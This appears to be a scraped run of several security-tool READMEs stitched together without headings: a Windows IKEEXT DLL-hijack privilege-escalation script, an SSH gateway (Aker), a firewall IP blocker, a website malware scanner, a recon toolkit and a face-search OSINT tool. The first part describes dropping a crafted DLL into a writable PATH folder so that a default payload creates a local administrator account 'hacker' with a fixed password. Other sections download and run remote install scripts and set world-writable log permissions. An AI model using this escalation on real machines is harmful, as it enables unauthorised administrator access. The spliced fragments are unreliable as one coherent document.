• Invoke-IkeextExploit - If the machine is vulnerable, exploit it by dropping a specifically crafted DLL to the first weak folder.

• OS version - If the OS is Windows Vista/7/8 then the machine is potentially vulnerable.
• IKEEXT status and start type - If the service is enabled, the machine is potentially vulnerable (default).
• PATH folders with weak permissions - If at least one folder is found, the machine is potentially vulnerable.
• Is wlbsctrl.dll already present in some system folder (i.e. a folder where DLLs can be loaded from)? - If wlbsctrl.dll doesn't exist, the machine is potentially vulnerable (default).

Invoke-IkeextCheck [-Verbose] 

PS C:\temp> . .\Ikeext-Privesc.ps1
PS C:\temp> Invoke-IkeextCheck -Verbose

• Depending on the IKEEXT start type:
  • AUTO - The exploit files will be dropped to the first weak PATH folder, provided that the switch '-Force' was set in the command line (safety override).
  • MANUAL - The exploit files will be dropped to the first weak PATH folder. Then, the service start will be triggered by trying to open a dummy VPN connection (using rasdial).
• The following exploit files will be dropped to the first vulnerable folder:
  • wlbsctrl.dll - A specifically crafted DLL (32 & 64 bits), that starts a new CMD process and execute a BATCH file.
  • wlbsctrl_payload.bat - The BATCH file that will be executed.
• BATCH payload:
  • Default - A default BATCH payload is included in this script. It will use net user and net localgroup to create a new user (hacker with password SuperP@ss123) and add it to the local administrators group (the name of the group is automatically retrieved by the script).
  • Custom - A custom set of commands can be specified using the parameter -Payload .\Path\To\File.txt and a file containing one command per line.
• Log file - Each payload command's ouput is redirected to a log file located in the same folder as the DLL's. Its name will be something like wlbsctrl_xxxxxxxx.txt. So if this file is not created, it means that the payload was not executed.

Invoke-IkeextExploit [-Verbose] [-Force] [[-Payload] <String>]

PS C:\temp> . .\Ikeext-Privesc.ps1
PS C:\temp> Invoke-IkeextExploit

1. PATH folders with weak permissions - Some applications are installed directly in C:\ and add themselves to the PATH environment variable. By default, folders created in C:\ are writable by any authenticated user so make sure to drop these privileges.
2. Disable IKEEXT - In most cases, IKEEXT could simply be disabled by applying a GPO. This can be a good solution for servers but it is not advised for workstations.
3. Deploy you own DLL - Deploying a dummy wlbsctrl.dll in C:\Windows\System32\ for example is an efficient solution since this directory has a higher priority than PATH folders.

• Supports FreeIPA 4.2 , 4.3 and 4.4 (Optional)
• Extensible, Write Your Own Module
• Session Playback
• Extract Session Commands
• SIEM-Ready json Session Logs
• Elasticsearch Integration

• Phase 0
  
  • Integration with an identity provider (FreeIPA)
  • Extendable Modular structure, plugin your own module
  • Integration with config management tools
  • Parsable audit logs (json, shipped to Elasticsearch)
  • Highly available setup
  • Session playback
• Phase 1
  
  • Admin WebUI
  • Live session monitoring
  • Cloud support (AWS,OpenStack etc..) or On-premises deployments
  • Command filtering (Prevent destructive commands like rm -rf)
  • Encrypt sessions logs stored on disk.
• Phase 2
  
  • Support for graphical protocols (RDP, VNC, X11) monitoring
  • User productivity dashboard

• Linux (Tested on CentOS, Fedora and ubuntu)
• Python (Tested on 2.7)
• (Optional) FreeIPA, Tested on FreeIPA 4.2 & 4.3
• redis

• configparser
• urwid
• paramiko
• wcwidth
• pyte
• redis

• Automated :
  
  • Use this ansible playbook
• Manually:
  

• Aker can be setup on a FreeIPA client or indepentantly using json config file.
  
  • Common Steps (FreeIPA or Json):
    
    • Clone the repo

     git clone https://github.com/aker-gateway/Aker.git /usr/bin/aker/

    • Install dependencies (adapt for Ubuntu)
      

       yum -y install epel-release 
       yum -y install python2-paramiko python-configparser python-redis python-urwid python2-wcwidth redis

    • Set files executable perms
      

      chmod 755 /usr/bin/aker/aker.py
      chmod 755 /usr/bin/aker/akerctl.py

    • Setup logdir and perms
      

      mkdir /var/log/aker
      chmod 777 /var/log/aker
      touch /var/log/aker/aker.log
      chmod 777 /var/log/aker/aker.log

    • Enforce aker on all users but root, edit sshd_config
      

      Match Group *,!root
      ForceCommand /usr/bin/aker/aker.py

    • Restart ssh
      
    • Restart redis
      
  • Choosing FreeIPA:
    
    • Assumptions:
      
      • Aker server already enrolled to FreeIPA domain
    • Create /etc/aker and copy /usr/bin/aker/aker.ini in it and edit it like below :
      

      ```
      [General]
      log_level = INFO
      ssh_port = 22
      
      # Identity Provider to determine the list of available hosts
      # options shipped are IPA, Json. Default is IPA
      idp = IPA
      hosts_file = /etc/aker/hosts.json
      
      # FreeIPA hostgroup name contatining Aker gateways
      # to be excluded from hosts presented to user
      gateway_group = gateways
      ```

  • Choosing Json:
    
    • Create /etc/aker and copy /usr/bin/aker/aker.ini in it and edit it like below :
      

      ```
      [General]
      log_level = INFO
      ssh_port = 22
      
      # Identity Provider to determine the list of available hosts
      # options shipped are IPA, Json. Default is IPA
      idp = Json
      hosts_file = /etc/aker/hosts.json
      
      # FreeIPA hostgroup name contatining Aker gateways
      # to be excluded from hosts presented to user
      gateway_group = gateways
      ```

      • Edit /etc/aker/hosts.json to add users and hosts, a sample hosts.json file is provided .

1. Run bash install.sh to set helpful aliases and enable logging
2. Configure "config" in a text editor to add firewall address(es), authentication, & any other applicable options such as:

• add multiple firewalls to configure them all simultaneously
• configure email alerting to be alerted when an IP is blocked or un-blocked
• whitelist IPs that you never want to get blocked
• optional logging feature for audit capability

# blockip 12.34.56.78
[-] (firewall01) Added IP '12.34.56.78' to firewall group 'Deny_All_Group'

# removeip 12.34.56.78
[-] (firewall01) Successfully removed IP '12.34.56.78' from firewall group 'Deny_All_Group'

• Scan any website for malware using OWASP WebMalwareScanner checksum, YARA rules databases and ClamAV engine (if available)
• Perform some cleaning operations to improve website protection
• Monitor the website for changes. Details are written in a log file
• Scan your site to know if it has been infected with some malware
• List your local backups
• Logging support
• Backup your site
• Restore website
• Scan for suspect files and compare with a clean installation (for Wordpress and Drupal)
• Clean up your site to avoid giving extra information to attackers (only available for Wordpress)

• Python >= 3
• Some Python libraries
  • python-magic
  • yara-python
  • watchdog
  • termcolor
  • pypandoc
  • progress

santi@zenbook:$ pip3 install python-magic yara-python watchdog termcolor pypandoc progress

• ClamAV to integrate with its engine (optional but recommended)

OSError: /usr/lib/libyara.so: cannot open shared object file: No such file or directory

santi@zenbook:$ ln -s /usr/local/lib/python3.5/dist-packages/usr/lib/libyara.so /usr/lib/libyara.so

santi@zenbook:$ brew install libmagic

masc 0.2.2 (http://github.com/sfaci/masc)
usage: masc.py [-h] [--add-file FILENAME] [--add-word STRING] [--clean-cache]
               [--clean-site] [--list-backups] [--make-backup] [--monitor]
               [--name NAME] [--path PATH] [--rollback] [--scan]
               [--site-type {wordpress,drupal,custom}]

optional arguments:
  -h, --help            show this help message and exit
  --add-file FILENAME   Add a suspect file to the dictionary
  --add-word STRING     Add a suspect content to the dictionary
  --clean-cache         Clean masc cache (cache and logs files, NO backups)
  --clean-site          Clean up the site to hide information to attackers
  --list-backups        List local backups
  --make-backup         Create a local backupv of the current installation
  --monitor             Monitor site to detect changes
  --name NAME           Name assigned to the scanned installation
  --path PATH           Website installation path
  --rollback            Restore a local backup
  --scan                Scan website for malware
  --site-type {wordpress,drupal,custom}
                        which type of web you want to scan:: wordpress,
                        joomla, drupal or magento

git clone https://github.com/joker25000/Devploit

cd Devploit
chmod +x install
./install

Devploit

• DNS Lookup 
• Whois Lookup 
• GeoIP Lookup 
• Subnet Lookup 
• Port Scanner 
• Extract Links 
• Zone Transfer 
• HTTP Header 
• Host Finder 
• Robots.txt 
• IP-Locator 
• Traceroute 
• Host DNS Finder 
• Revrse IP Lookup 
• Collection Email 
• Subdomain Finder 
• Install & Update 
• About Me 
• Exit

wget https://raw.githubusercontent.com/ThoughtfulDev/EagleEye/master/pre.sh && chmod +x pre.sh && ./pre.sh

$ sudo apt update && sudo apt upgrade -y
$ sudo apt install git python3 python3-pip python3-dev
$ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry

{
    "DEFAULTS": {
        ...
    },
    "WEBDRIVER": {
        "ENGINE": "firefox",
        "PATH": "PATH TO geckodriver e.g C:\\Program Files\\geckodriver.exe"
    },
    "FILTER": [
        ....
    ],
    ...
}

$ chmod +x /path/to/geckodriver

$ python3 eagle-eye.py

$ python3 eagle-eye.py -h